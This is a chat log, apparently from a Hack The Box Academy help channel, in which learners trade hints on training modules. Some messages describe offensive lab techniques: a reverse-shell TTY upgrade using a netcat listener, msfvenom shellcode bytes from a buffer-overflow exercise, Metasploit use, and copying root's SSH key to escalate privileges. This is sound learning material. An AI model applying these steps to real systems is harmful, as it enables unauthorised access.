#modules

and pay attention to some of the other options

OMG Thank you I got so frustrated on this one ! I'll try it right now (at least i learned how to use metasploit and searchsploit eheh ^^' )

!rank

!rank

yes

Hi I'm doing Nibbles Privilege Escalation in Getting Started. I created a shell on the remote host, but whenever I try a command in the shell I get nothing in return

Anyone knows why?

I've just finished the web request module, I'm happy 🙂
I'm now doing the "learning how to learn one". Hope it will be helpful

@cerulean vine @deep tartan Please use the bot commands in #bot-commands. Not here.

Read the question carefully mate, it's saying "execute command as a different user" and not "change user"

Runuser?

Run a COMMAND as another user

This is probably the biggest hint I can give you

Don't panic

Just be calm and check the -help Menu

DM me if you still confused

Did you solve Skills Assessment - SQL Injection Fundamentals ?
DM me please

It's medium module. Write Your question there.

Sorry, thought was Fundamental (because of the name) 😓

Hello guys i have a problem on the getting started module

So on the section "service scanning" there is a question that says: " Perform an Nmap scan of the target. What service is running on port 8080? (two words)"

when i perform the nmap scan it tells me the service running on 8080 port its http_proxy but when i submit the answer it keeps telling me its wrong. Any help?

What type of scan did you do?

You can just do a normal nmap script scan and get the answer

i used nmap -p 8080 <traget ip>

hello

1

sorry , I need help pls

the first, I apologize for my level of English

no problem

Could someone give me a list of words to do value fuzzing?

I am in the module, of attacks on web applications with ffuf, in the last section and I have to make a post, to find out the working value of a use, I have tried with many lists and none, it gives me results.

I believe that's an 'easy' module, you should probably ask it there

Sorry, I'm wrong

Hello guys! I'm going through windows fundamentals and stuck on this task: Find the non-standard directory in the C drive. Submit the contents of the flag file saved in this directory.
Could you explain: what is the non-standard directory?

Done. not actual anymore:)

This is just scanning port 8080 if I am not mistaken

Never mind 1 guy helped me out already

ahh ok then

Hi guys, i'm stuck at Privilege Escalation in Getting Started Module. I try some way to esclate from user1 to user2 but it just not work, i enumerate the system with linpeas.sh, get some info but still can't find any thing. Anyone got through this challenge could give me some hints please? thanks so much

Hello, im having a problem in the fundamental module called "Web Request" In POST request... The problem is that i did what i think i need to do to get the user administrator (and i get the flag) but the flag is incorrect... I tried to refresh and repeat the process and then the flag disappear and i cant find it and i dont know if there is a problem or something

hey man

I'll shoot you a dm

ok bro

Hint: decode base64

Yeah i did it some time ago! Thanks to @neon shard and @slate arch For the help ^^

can i use my own terminal for doing challenges , start point and modules ?

My friend is doing it like that and seems like everything works nice and he can do the challenges of the module whit no problem

sorry i didn't know that

You ever get this figured out? wget down the flag.txt from the web directory? I get 403ed on every web directory. Using my own machine connected to vpn

could i get some help with something? so i'm on the module web requests, and i'm doing the GET method. i went throught the main part without any trouble, however the question is really stumping me :
"Send a GET request to flag.php with two parameters num1 and num2 such that their sum is 1337."
how do i do this, or could i get some help? much appreciated

I did but honestly can't remember it was a few weeks ago... I'll check and see if I can remember

You need to make a request with curl, if you remember you use the ip and the port and all of that
Afterwards you specify flag.php and send the parameters

I hope I was not to bad explaining, any way if you still have any trouble you can PM and I will try to explain you

can i pm you?

ok

Yees, Pm 😄

i got it! thanks man

No problem 😄

Do you ever figure this out? I can't upload file from my linux host.

I was able to stand up http server to download file from rdp but the question would not except the hash. Any advice?

Actually I don't know how I solved it. It was something like this: create the same file on the Windows Host yourself (copy&paste content to a .txt file with the same name), then compute the hash and submit it.

Give er a whirl. I'm trying to download zip from rdp client from an http server. Thanks for reply

are you trying from machine to host or host to machine?

Any help would be appreciated. I have little knowledge of linux. I am on the exercise for "System Information" and am stumped by 2 questions. 1 is What is the path to the htb-student mail, and the 2nd is Which shell is specified for the htb-student user. I just need to be pointed in the right directions please.

Nevermind. Figured it out.

Hello everyone, i don't know if it's a common thing... but Im stuck in Skills Assessment of web fuzzing with FFUF. If somebody finished that module, please help 🙂

Does anyone have a remote desktop error in the same windows fundamentals module like me, i can't remote or ping to ip address?

Be specific about the problem you have

Guys i'm stuck over 'getting started' - Nibbles - Initial Foothold. I can't seem to scan for any open ports over the target victim even though the host is detected up using -Pn option. But no port is listed though. Can't open the webserver from firefox either. Need help.

hey man

shoot me a dm

Or you can suggest the answer to the question "Log in with the credentials (guest: guest) and try to access the user with administrator rights from what you learned in this and the previous section?"

Anyone have any extra idea ?

So uhm... Im stuck in Linux Fundamentals, in the question that says " What is the path to htb-student's home directory?" And the next one is also a bit confusing... I tried a lot of commands but i cant really do it... Some help?

Also im trying to get the Kernel version but it gives me another format that isnt the one that the question is asking me to find

im confused af

Someone knows the answer to the question: "Login with the credentials (guest: guest), and try to get to the admin user from what you learned in this section and the previous section?".

yes

please help me

Dm me

Someone can help? : (

sure

Dm me

Hi! I am trying to do SQLi Fundamentals module but I cant connect with the database

That's an 'easy' module, you should try it there

Im stuck at the mail question too. The other question you can find a way to locate the default shell for linux( bash)

please help me

Which Windows NT version is installed on the workstation? (i.e. Windows X - case sensitive)

how can i check with win10 in Window Fundamental module

What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k? i got a file that matches all criteria but doesnt work

i have the same problem, what find command did you use ?

||find / -name *.conf -newer 2020-03-03 -size +25k -size -28k 2>/dev/null||

yeah strange
do you also find a file that looks like this ?
||/usr/share/drirc.d/00-mesa-defaults.conf||

Does anyone have a tip on Public Exploit Question 1? pls dm

I'm working on the Attacking Web module, in the skill assessment... For question 4, it's says that there should multiple values but when I fuzz the page of question 3 I only get one parameter... Can some one help me out to figure it out?

Yep

DMs are welcome

Hello all,

I have ran into problems on the User Management section of Linux Fundamentals and am looking for assistance for question 2 and 3 (please note I am not looking for the answer directly just some guidance on the right path).

Which option needs to be set to lock a user account using the "usermod" command?(long version of the option)

Which option needs to be set to execute a command as a different user using the "su" command?(long version of the option)

For both of these questions I know how the commands need to be written and how they operate but even with that knowledge I cant seem to find the correct answer? Please help!!!

try echo [file]

should lead the right way

hello can someone help me with this

Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

Hi I'm doing Nibbles Privilege Escalation in Getting Started. I created a shell on the remote host, but whenever I try a command in the shell I get nothing in return.Anyone knows why?

solved, nevermind, thanks

you need to ensure that you have a connection active with 'ssh status' then as long as it is active you can then enter through "ssh user@ip"

you need to enable ssh to start on the terminal from there you ensure that the status is active then run that command in terminal

Is there anybody I can DM regarding the first question before the skills assessment in Login Brute Forcing? I have finished all the skills assessments but can't figure out this one.

Maybe some kind of enum for privilege escalation, or maybe ssh?

hi guys, i have some problem in windows fundamental, security content, in the question " What non-standard application is running under the current user? ( case sensitive)". I tried everything possibile... with and without extensions but Nothing. If someone can help me i would really appriaciate.

can someone give me a hint to whith privilege escalation to user2 in the getting started modul. plz dm

Hello! So, im in Package Management (Linux Fundamentals) And they say that i need to install git

So i tried that but something is wrong

and i dont know what im not doing right

Hi guys i am stuck in this question after so many tries i come here for the help** How many files exist on the system that have the ".bak" extension?** I tried locate *.bak and it show me 2 files and answer is incorrect what should i do Please guide.

hello I have a problem with a fairly easy module
getting started
whatever it tries to do, it doesn't work.
Namely, I have a problem with this question
Access the SMB share folder called 'flag' and submit the contents of the flag.txt file.

Seems pretty clear what ur supposed to do

@sour otter did you use find?

I see this on Windows fundamentals
"Using the command icacts c:\users /grant joe:f we can grant the joe user full control over the directory, but
given that (oi) and (ci) were not included in the command, the joe user will only have rights over the c:\users folder
but not over the user subdirectories and files contained within them."
and try to apply this(icacts c:\users /grant joe:f) on htb instance by replacing 'joe' with 'htb-student' and the command become successful, when i open c:\users folder and try to access subfolders it was accessible .how?
I not write oi, ci in command.

Help me please

Hi guys, I'm stucked in last question Window Fundamental:What non-standard application is running under the current user ? (The answer is case sensitive).

please help me :((

hi, I'm doing the Getting Started Module, I'm on the final knowledge check - should the VPN connection be so slow?

sometimes, I'm wondering whether my Internet bandwidth is playing tricks on me - but not this time 😉

Hey guys, I am stuck on the "public exploitations" section in the "getting started" module. Can someone help or advice me please ?

Specificly descirbe your problem

This is the only question in the section "Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)". I can use and get backup files with msfconsole auxiliary module

Cuz my target runs wordpress service and plugin vulnerability

Anyway I have etc/passwd folder but idk what should i do right now ?

I found when i writing by the way

LeL ^^

Read carefully the options of that metasploit module and you will find out the answer

hi guys, i have some problem in windows fundamental, security content, in the question " What non-standard application is running under the current user? ( case sensitive)". I tried everything possibile... with and without extensions but Nothing. If someone can help me i would really appriaciate.
really i can't idk...

I was stuck there too. Hint: The answer (which is not an obscure process), is pretty obvious: It helps you connect to HTB network. No extension on this answer, just the name

can i DM you??

yup yup

i don't think you are meant to do that

!rank

@dusk axle This channel isn't for bot commands. Please next time use commands in #bot-commands. Verbal warning

who completed the
Getting Started module
Page 7 Service Scanning
plz dm me
tnx

I did. But chat is nice because it can help others.

i'll be glad if u dm me

Hey I'm doing Linux File Transfer (last question) and what I tried is to vim the .txt from the target and then use the hasher, but that flag is invalid. I uploaded upload_nix.zip to the target, but unzip isn't installed on the target and htb-student isn't in subdoers so I can't install it... I also tried directly uploading the .txt to the target ,but when I run hasher it gives another invalid flag... I really don't know what to try anymore so if someone could tell me how I can actually unzip this goddamn file from the target it would be great. Thanks in advance

Guys I need some hint on getting started -> final knowledge check question 2. privs escalation. I was able to get into a meterpreter session, but i need some ideas to escalate my privs to root. Shell isn't responding to commands.

^got the same problem

have you red the hint?

Yes i did. I can't interact with the shell after spawning a shell session with metepreter. Is there a way to run enumeration scripts within metepreter itself ?

I remember using the "shell" command in meterpreter and then nothing happened, but commands were working.

Not for me sadly. It just hangs there till i exit the channel

so i dont know if i did it right or not, working on file transfers. I ran $wget -O flag.txt http://10.129.34.0 and got the file but when i view it its a large https file and i dont know what to put as an answer or did i do this incorrect?

The -O option will write to a file the content of the url destination, so it gives you / (probably index.html or something), hence the html code. You want flag.txt

so do i then need to do a html to txt or is there a sub command im leaving out?

I think just a wget to the flag destination will reveal it, but it's been a while.

If I do wget file.txt http://ip gives me the index.http you were refering

I mean http://ip/flag.txt so wget gets /flag,txt

Ahhh ok

yep that was it

thank you

glad it worked!

hi guys, I'd need your help.
I'm currently doing the Getting started module (Basic Tools).
Question:

Optional Exercises

Challenge your understanding of the Module content and answer the optional question(s) below. These are considered supplementary content and are not required to complete the Module. You can reveal the answer at any time to check your work.

Apply what you learned in this section to grab the banner of the above server and submit it as the answer.

I tried using netcat <ip address> but there's no port[s] to connect to

Please point me in the right direction. Thanks in advance guys

has anyone ran into the issue of port 22 connection refused when trying to establish an ssh connection on the workstation

In the meterpreter, type shell to create a shell.

anyone here who has completed the getting started module? need help

Yes, there is one. Re-read the line where your target is specified.

Hi Guys need help with GETTING STARTED -Privilege Escalation „once you gain acces to „user2”, try to find a way to escalate your...”. Cant find good answear upper

yeah im also stuck on that question

U gain acces to user2?

yes

Same here, lemme know if u find something

k i will dm you if i find anything

Same here 😄

How can I access the remote spawn system ?

@ripe orbit try to do as explained in that section. Have a closer look at id_rsa

Sure, but I don’t know what I need to type there

In id_rsa

Thanks for hint, but it’s not enough hahah

@ripe orbit try to see if you can view the id_rsa of the root user

Yeah we already tried that and as in the example explains, u need to chmod the id_rsa but when i tried that, it says permission denied

how we can download this file to our machine?

if you cant download it, try to view it and copy it to your machine

i did it already

but if i trying to using ssh with my "id_rsa" i have error "Loadkey "id_rsa": invalid format"

u have answear for this? 😄

make sure that the content is the same

then which user id_rsa did you copy?

in user 2 from/home/user/.ssh/id_rsa

which user has the highest privileges?

hey w8 moment i have an idea

good

what u mean highest privileges?

user2?

root

yes, but we dont have acces, so user2 imo

i copied the rsa file from /root/.ssh/id_rsa

still getting invalid format

did you use chmod?

ye, same here

i have file on my Desktop "id_rsa" (i already pasted key from user2 id_rsa) then i type in my terminal ssh root@<IPHERE> -i id_rsa

yep

yes

now delete it so we wont sopolier anything

ok now for some reason it freezes

same here

try to redo those steps

you guys now if the webpage is not working properly? i want to start an instance but it tells me no instance available

have same problem 15 min ago, w8 moment

i really gratefull... thanks buddy... i love u. My brain could explode soon ❤️

I’d reload the page or restart your browser

Happy to help

Why i cant ping retired machines on htb is it bcs there is so many people in the server

Are you allowed to nmap https://www.inlanefreight.com/ ?

i pinged a machine it worked

i nmaped it itworked

when i pinged it again i didnt work no more

@plucky temple you need to nmap it?

no i was just wondering if it is allowed, because they sometimes use it in examples

just an example 🙂

sorry, idk

i've been stuck for 5 days of the Stack buffer overflow Skill assessment. Whatever shellcode generated (with --bad-characters \x00 \x09 \x0A \x20 parameter) it always crashed.

I did have all other steps right: eip was overwritten and jump to the shellcode

it can be any where in the shell code. Some time the netcat got connection but the shellcode crashed before I could send any command. Other times, the shell code crashed right away after execution of 1st instruction.

I then tried inject a very simple shellcode without any encoding (generated without parameter --bad-characters) directly to the buffer then this shellcode worked fine, made connection to netcat and I could send and receive message to it. However, under gdb the setresuid() always return -1, does not work, so I could not get root. And it's impossible to execute at command line without gdb because the simple shellcode cannot be passed to the program due to bad characters (0x00).

That's the reason for using --bad-characters. Something must be wrong in your shellcode, confirm you're using the same parameters as in the module's explanation when launching your msfvenom.

hey guys, I'm stuck on this question on the getting started module: Access the SMB share folder called 'flag' and submit the contents of the flag.txt file.
I tried this: smbclient ////IP//flag and I get an error message.
I also tried to list the shares using -L, but it didn't show me that there is a flag share. only users...
can you help me?

yeah, it's a copy/paste. I cannot understand why it does not work. Each time different shellcode is generate. Below is one instance. The shellcode starts from 0xffffcd0d.

0xffffcd08: 0x90 0x90 0x90 0x90 0x90 0xdb 0xc0 0xd9
0xffffcd10: 0x74 0x24 0xf4 0x5a 0x2b 0xc9 0xb1 0x12
0xffffcd18: 0xbe 0xf0 0x58 0xe3 0x85 0x31 0x72 0x17
0xffffcd20: 0x03 0x72 0x17 0x83 0x32 0x5c 0x01 0x70

Disassemble:

0xffffcd0d:  fcmovnb st,st(0)
0xffffcd0f:  fnstenv [esp-0xc]
0xffffcd13:  pop    edx
0xffffcd14:  sub    ecx,ecx
0xffffcd16:  mov    cl,0x12
0xffffcd18:  mov    esi,0x85e358f0

0xffffcd1d: xor DWORD PTR [edx+0x17],esi <== crash
0xffffcd20: add esi,DWORD PTR [edx+0x17]

The code does not make any sense. With the code like this, surely always crash. Why does it use "pop edx" at 0xffffcd13 when it does not know what was push into the stack before??? and then uses it later which causes the crash at 0xffffcd1d

I think msfvenom generates different codes every time which is cool to avoid identification of shellcodes by protecting programs. I don't know what your specific problem is because I don't know what you've really done.

Hello ive been struggling with this question

can you please help me ? 👉 👈 😳

Hey guys, got a problem with "Getting Started" -> "Knowledge Check".
Got meterpreter connected but failing at privilege escalation with php. I think it´s just a simple problem, but i don´t get it for hours now 😄

hey man, pm me

Hi, can you help me ? -> NETWORK ENUMERATION WITH NMAP -> Nmap Scripting Engine
I used a script from nmap: nmap <IP> -p 80 -sV --script="http-*" and others but nothing works

Which problem are you on?

Thanks, Charon. I understand why the generated shellcode changes signature each time, not an issue. The problem is: it crashes at execution. And when I look at the code I see it's not right, like the above.

it's a simple stack overflow, nothing special

Hey guys i need help with this module https://academy.hackthebox.eu/module/41
maybe someone can help me

Hey can somebody help me with the emdee five for live challenge? I wrote a python script and tried to receive a response with the certain string, encrypt it and send it back in the same session but it seems i am doing something wrong

-m for the home directory

@mint lava @uncut temple I did it, thank you for your help ^^

What do you mean live challenge?

nevermind i found a solution 😅 but thank you anyways

Hey guys, can you help me ? got a problem with "Getting Started" -> "Knowledge Check",I GET USER.TXT，but i can't use the scripts such as LinEnum and LinPEAS to escalate privileges to root on the target

Hi guys I'm on linux fundamentals, I'm connected with ssh on the target machine using my own kali VM, I need to find the "machine hardware name" but It seems the results I got from "uname" commands wont match the answer

should I copy paste the entire string after doing uname -v?

General question for reverse shells: Whenever I do one, I can never get it so that it accepts control sequences. This makes it basically impossible to use vi. Thus far I have been using grep and sed to edit files and I think there has got to be a better way. I don't know if it's a problem with my terminal or ncat or if I need to do stuff after getting the shell.

uname --help | grep hardware might tell you what you're looking for

You'll need to upgrade it to a full tty. Here is the process I like for ZSH.

user@remote:/var/www/html$ python3 -c 'import pty; pty.spawn ("/bin/bash")'
python3 -c 'import pty; pty.spawn ("/bin/bash")'
user@remote:/var/www/html$ ^Z
zsh: suspended  nc -lnvp 9001

┌──(nightwolf㉿archlinux)-[]
└─$ stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'                                                                                                         148 ⨯ 1 :gear:
rows 42
columns 185

┌──(nightwolf㉿archlinux)-[]
└─$ stty raw -echo; fg                                                                                                                                                               1 :gear:
[1]  + continued  nc -lnvp 9001
                               stty rows 42 cols 185
user@remote:/var/www/html$ export TERM=xterm-256color
user@remote:/var/www/html$ exec /bin/bash
user@remote:/var/www/html$

Yeah there might be something going wrong with my hackthebox session idk, I got x86_64 as result with both commands

thank you anyway I'll figure this out

nice, tysm

need help on getting started priv esc user2 to root, next part has spoilers for the exercise ||im confused how do you properly format priv and public ssh keys to log into a server? on getting started ive managed to execute commands as user2 and have catted both private and public keys and put them on my vm but when i try to ssh in it says my key is invalid format||

iirc openssh won't acknowledge your keys as valid unless they have restricted permissions
chmod 600 my_key will set the permissions on my_key to owner rw only

ok ill try thx

hmm i just tried that and it didnt work

Hey I need a nudge on Getting Started - Privilege Escalation Question 2. I escalated to user2 and I'm trying to move my key.pub in the target machine to /root/.ssh/authorized_keys, but the permission is denied.

Hi guys complete newbi here....so i am stuck on the windows security section of the windows fundamentals. The find the SID of bob.smith user, its driving me mad i thinking it is something simple that i am missing any pointers would be great cheers.

Hey I am doing the File transfer module and I am stuck on question to download flag.txt using wget so I am using this command ==> wget http://<ip>/flag.txt , but it is saying connection failed , is there something I am doing wrong?

always remember google is your friend, this article should help you https://windowsloop.com/find-sid-of-user-windows/

That's really strange I just tried what you did and it worked for me. Are you sure you're in the right section of the module? Are you literally using the command you've posted? Maybe you need to refresh your target?

@flint helm thanks that has helped a lot..So much to learn but loving it

@flint helm It's done!! ,I just used sudo and it worked

Hi, I still can't find the "machine hardware name" from the question 1 in linux funds, others answers are ok but is this one broken?

All I got from uname command is "nixfund" or "Linux" or "x86_64"

Am I allowed to use tools from my kali VM against the ubuntu VM IP given in the exercise?

it seems being "htb-student" don't give the right result after doing things like uname -m or whatever

if you haven't ssh'ed into the target do not expect something else

but I did ssh I'm logged as "htb-student" on the given IP adress

You are close

so htb-student have no rights to know the machine hardware name am I right?

nope, he has the rights to see the machines hardware name

you already even have said the hw machine name

yeah I know but the module don't want it as an answer

Ok the module is bug it wont accept underscore manually entered

have to do copy past

I had the answer since the beginning

thank you @autumn pilot

Probably if you have switch to a language different from EN for typing, the special symbols might differ for some reason

My computer is "FR" with azerty keyboard but I installed virtual machine and kali in english-US, you think that might be the problem?

My guess would be this

Ok thank you I'll look into this

Try to experiment, if you have something similar try both ways, first typing in FR keyboard style and then EN

the vm is full EN I can't switch but anyways the underscore should be on "8" on every keyboard if I'm right

On mine its not

It's here on mine

wow ok thanks I didn't know that could happen

no worries, its good when you learn something new 😄

it worked with your key 🤣 I tried x86)64 and it worked manually

Yeah I'm happy now I have an Onscreen keyboard with your input that will help for later thanks very much ^^

i havent tried it, (im doing the same part myself) but i think you need to chmod it out of 600 move it then 600 chmod it
btw i think you need to format the key on your vm to be pkcs 8

Hey guys can i dm someone for help to the question in Getting Started module- public exploits?

need a little nudge on getting root in the Getting started module 😦 I can't get the nc to respond

ok

Whats’up guys! Someone have problem with knowledge section on getting started?

It’s so slow and can’t get reverse shell witc nc or from meterpreter session

I am not able to find the answers of these two questions

Look at the man pages for both of those commands.

Look at the options. Should be -u something

having issues in Windows Fundamentals Modules, Introduction part. using RDP to target ip and right user and password resulting with "failed to connect" error

Anyone can point me on where to start? I am new to all the cybersecurity stuff....

would anyone be able to help with Web Requests, the POST section? it says at the top that i can use admin: password or guest:guest to login.

i'm following along and only guest:guest allows me to log in

also, i follow the steps through this page and i'm getting slightly different results in burp

If you have any background in some of the fundamental modules, I would still go through them as sometimes there are some things that you may not use normally that you can learn for cybersec. They help you think further outside the box when performing say an ethical hack for a pen test.

So in short, anywhere is good

Also, check out other platforms for learning too. Tryhackme is another good starting point

@vocal jewel Thanks

I am stuck on the assessment portion of the file include/directory traversal module. from what i've read, I know i need to get the php code to disclose, but i can't get the php wrappers to return anything on the index page.

Can someone help me with the question: Access the SMB share folder called 'flag' and submit the contents of the flag.txt file.

i only see a directory named users but i need a password for that: smb: > ls
NT_STATUS_ACCESS_DENIED listing *

which module

getting started

service scanning

isnt there something to do with a backup file?

???

hey complete newbie I have zero experience with Linux but just tying to learn, i am taking the Linux fundamentals course right now and i am stuck on the question " what's the path to htb-students mail " i am logged in to the target as htb-student i was able to answer the first two questions, just cant find the mail directory, any clues would be great

hi guys, i'm having some ssh issues. i can connect to htb-student with Pwnbox and navigate the machine but it freezes up eventually or is super laggy

also tried with ssh on my Kali VM through academy vpn, but when i ssh user@ip is just hangs forever

(for linux fundamentals module)

well, i was able to get the page source, but i'm having a hard time with the input filtering

i was thwarted by something silly, but i got it now

Can someone help me with the skills assessment of the sql injection module? I don't how to pass the login? I tried every possible payload to pass it.

maybe try:
ssh -l htb-student <ip>

Why o don't have permission chat another room

++tryverify

To talk in other channels you need to verify yourself first:

1. Send ++verify in the #bot-commands channel
2. Follow the instruction you will receive in PM (i.e send ++identify <Account Identifier> directly to the bot
   (The instructions are available in the #welcome channel)

this is form my Kali virtual machine on vpn. i enter and it just sits here. never prompts for password... then times out eventually and says: 'connection closed by 10.129.42.250 port 22'

are You able to ssh to any other workstation?

You can try resetting the service: (sudo) service ssh restart

thanks for the suggestions, will try some things and check back 🙂

Can someone help me with getting started
service scanning question: Access the SMB share folder called 'flag' and submit the contents of the flag.txt file.
i only see a directory named users but i need a password for that: smb: > ls
NT_STATUS_ACCESS_DENIED listing *

have you the right user ? about permissions

dumb question but u know

but which user is the right user? i tried Anonymous but its the same..

Right I have tried using /home/htb-student/mail that did not work so there has to be another step but I can’t find the other step there are only three folders in the home directory but when I try to ls them there is nothing in them so I am struggling to still find the path to mail.

You and @outer otter all good?

anyone on to listen to me vent about POST Method in Web Requests module?

The hardest part to understand for me was that you can only manipulate your way up to the admin user from the guest user.

makes sense: being that you need to access and then priv esc

I was stuck on the POST module as well.

i spent hours trying to get into it ( using the right method of attack mind you ) but initially signing in with admin and password

so when i had the right manipulated cookie, i couldn't get in bc i wasnt going in as guest

so i thought my method of attack was wrong

round and round i went. holy shit

I finally figured out I was supposed to log in as guest initially from watching a youtube video which was in italian. I don't speak Italian. lol

Congratulations for getting it! I figured I would tell you that because if you were as frustrated as me you deserve to hear it. haha

@vocal jewel Did you manage to do ffuf module?

no not yet. fuzzing?

Yeah

Is that a good one to go to next? It sounds like alternatives to dirbuster/gobuster

/home/htb-student/mail is a path to the mail directory in the home directory of the htb-student user

Right but when you type that in as the answer it’s says it’s wrong there might be something wrong with the module then. I have tried that answer a few times and it won’t accept it I will try and message htb academy directly about it thanks man

Nothing is wrong with the module. Make sure to read over everything.

@novel matrix is right. You overthink or do not really understand the basics. Re-read the module's content with understanding

Re read with understanding what does that even mean which section should I re read cause I will be the first to admit I have no idea what I am doing this is only the 2nd day I have tried dealing with Linux

You can also try to just skip this part and come back to it later. Maybe latter parts of the module will help You to understand how it works.

Sounds like a plan to me

Sorry guys I can'tn access the remote system and so I can't do the question at the end

Anybody knows where it is the problem ?

hey guys , why im not able to connect to the windows vm using xfreerdp

error say could not find the address for the rdp server

double check IP or click on a fresh target @sly elbow

I checked it and also try to reset it

but the error is same

The machine doesnt able to ping to win vm

@novel matrix there is a vpn key but when I tried to connect to that Cannot load private key file [[INLINE]] 2021-04-18 10:34:13 Error: private key password verification failed

can someone help me to make me understand this question below on sql injection module

In the 'titles' table, what is the number of records WHERE the employee number is greater than 200000 OR their title does NOT contain 'engineer'?

select emp_no,title from titles where emp_no > 200000 || title != 'Engineer';

i dont see anything wrong on my syntax i inputted the total amount of table that has been preview but it was wrong

In the linux fundamental you get asked to provide the index number of the sudoeres file in the /etc dir. so i went on used ls -i /etc/sudoeres and got the index but when entering im getting wrong answer. what am i missing here?

can someone help me with linux fundamentals im trying to ssh to htb-student but im not being able to i used ssh as "ssh htb-student@ip_address" but it just goes to another line and does not show any result

i have the same ssh issue this evening

it just timeouts after a while

If you wanted to inject a malicious link to "www.malicious.com", and have the clickable text read 'Click Me', how would you do that?

I tried doing this; <a href="www.malicious.com">Click me!</a>
and this; <form action="www.malicious.com">
<input type="submit" value="Click me!" />
</form>

But none of them worked, don't know exactly how they want me to do it.

so please help me somebody w superhackerskills

Remove the !.

Can someone please help me with privileges escalation question at Getting started in HTB Academy?

me too

yea sure

shoot me a dm

I have the same problem

I have tried the same with my target but it does not connect

Hello! I'm in Windows Fundamentals - Introduction to windows. I can't connect to the target with the command example. Nothing works! I'm going crazy.

@rustic sage did you find out the answers for the Linux Fundamentals package management git install issue. I am having the same problem.

Hey everyone! Working on the JavaScript Deobfucation: Source code. Found the js and think I know what to do, the issue is the format of the command to send. Can anyone help me nail it down?

Never mind I was nuking it

what's wrong with my answer?

@rustic sage I'm stuck on the that same question

it's tricky because they didn't even explain how to go in there. they only teach few commands and ask questions like that

today its working i guess it was some server issue👍

its correct but after /var/mail there should be one more path try using the username

does anyone know the answer this one Send a GET request to flag.php with two parameters num1 and num2 such that their sum is 1337. well its good for a help

yea

Dm me

Hi i m a newbie and french speaking so frogive me please. I keep getting this message on nmap (Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn)
I'mtrying to complete the network enumation with nmap host and port scanning. it worked fine the first time, but now i keep getting this! thanks!

Is the lab connection offline or online. I had that issue when i was not paying attention and the machine was offline

it s been like that since yesterday

You may need to change the vpn location you are using

Thats what solved my issue

oh thanks i ll try that!

Hey guys , I am in the final test in Getting Started Module . But the URLs takes sooo long to load . Is it normal ? Propably due to the event the traffic is big ?

anyone help me with the priv escalations pls? I've got the user flag for the Get Simple, but struggling with the root flag...

Im on the same spot guys

yeah literally it takes like 3-4 mins to load the admin site

Maybe we can help each other and try to get the root.txt flag

i would , but it takes me more than 5 minutes to load every page

I've got a shell on the server...

I don't understand how to answer that question. How did you realize it was in the var / mail .....

im stuck in this question..

i have solved the problem

echo $MAIL

or env

dude god help you... thank you

done

welcome 🙂

Hello guys, got a big problem here. After creating a session with msfconsole, when i type shell i get a procces and a channel created, but when i run any command for example sudo -l the shell freezes and i dont get any output. Idk if its something wrong with me or with the instance, because ive been talking with other guys and they dont have this problem. At this point i cant keep going because to get root access i need this command to work. Please i need help

you can get it respond quickly, Look around in the site.

can someone help me my target doesnt respawn or it shows a new ip instant but there is no connection and when i refresh the page there is again Click here to spawn the target system! i already deleted the cookies dont know what to do... it doesnt work with another browser too..

@sterile hawk hello sorry for wasting ur time but how can i speak in other channels

++tryverify

To talk in other channels you need to verify yourself first:

1. Send ++verify in the #bot-commands channel
2. Follow the instruction you will receive in PM (i.e send ++identify <Account Identifier> directly to the bot
   (The instructions are available in the #welcome channel)

@hearty saffron ^^

ok

@rustic sage did you upgraded TTY?

I suggest You to begin with fundamental modules on the HTB-Academy.
https://academy.hackthebox.eu

i tried to upgrade it by using python, but i get "unknown command" as output

Please after my account has been verified by the bot what to do??

What is the python version?

Good evening everybody. I can't finish the first page of windows fundamentals (file system). The question is What system user has full control over the c:\users directory? I got the command (icacls) and used on command line. I got the answer of this command, but I couldn't get the flag. Someone could help me? Thanks in advance. #keephacking

DM me if You need a hint. Don't want to spoil the solution here

hi everyone

i'm stuck, i thing it's kind of a bug... in a dumb dumb module of making a mysql connection....

the target system I spawn can't connect to mysql

it just says mysql 2002 error, and whenever i try to reach out for the port (to see if the service is UP), netcat tells me "connection refused" and I can't proceed :/

has anyone found this before?

i need help with the getting started public exploit question. i think i have the right exploit but when i use it it just shows
Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed without doing anything, im trying since 2 days can someone help me?

Do you still need help?

i dont know what to write in filepath..

What's the question?

Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

OK, this question is good

Did you get to look at all the options when you type "show options" ?? I lost a little time on this issue too

thats perhaps the problem how i said i dont know what to write in filepath.. i tried many things but still doesnt work..

DM me

I will help you

Hi guys I am on File transfer module ,I have uploaded a zip file to target but I need to unzip( I can't even Install any tool as the user is not in sudoers) Can any anyone tell how to unzip it ? Thanks in advance!!!

does it have tar?

Nope it a zip file

Anyways I got it how to do it👍

@tranquil carbon Thanks for the help ,but zip/unzip tool was not installed on the target so I just found another method

Anyone stuck on the Web Requests POST Method exercise?

may I please have a hint for the service enumeration section for finding the flag on the nmap module? I'm running the following command

nmap 10.129.18.235 -T4 -sV -n -Pn -p 22,80,110,139,143,445,31337 --packet-trace

I see a lot of output and have gone through it, but I can't find what specifically would be the flag. I have ennumerated each of the ports specifically and couldn't find anything interesting. Perhaps I'm not seeing this right. When ennumerating port 80, obviously, the entire HTML content was displayed, but couldn't find any specific string that would could be considered as a flag.

hey , can i have a nudge please on introduction to web application , page 8 : HTML injection
i think i have the right answer but maybe the format is not right

Can I dm you ? I've done that

select * from titles where emp_no > 200000 OR title != 'Engineer' What's wrong with this request?

Can anyone help me with this question "Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option)"

You could get the answer by using the --help option

Yep I tried everything from that, it says incorrect

what option did you put in??

@small pivot i dmed you

su --command

just put in the option

not the command together

Yeah it worked, thank you .

Hi, Im doing page 9 on getting started (Public Exploits) ... im trying to spin up an instance but it says none available ... is there a connection pack so i can do this from my kali box?

Hey there.. I'm trying to complete the skills assessment for sql injection.. but I'm stuck. I've enumerated the databases, but when I try to read the tables - I get a blank result... anyone give me a hand?

hey guys, super dumb question but i think there's a language barrier and i can't understand it, i'm doing a module question and it asks
"Enumerate the hostname of your target and submit it as the answer. (case-sensitive)"
what are they asking for exactly??

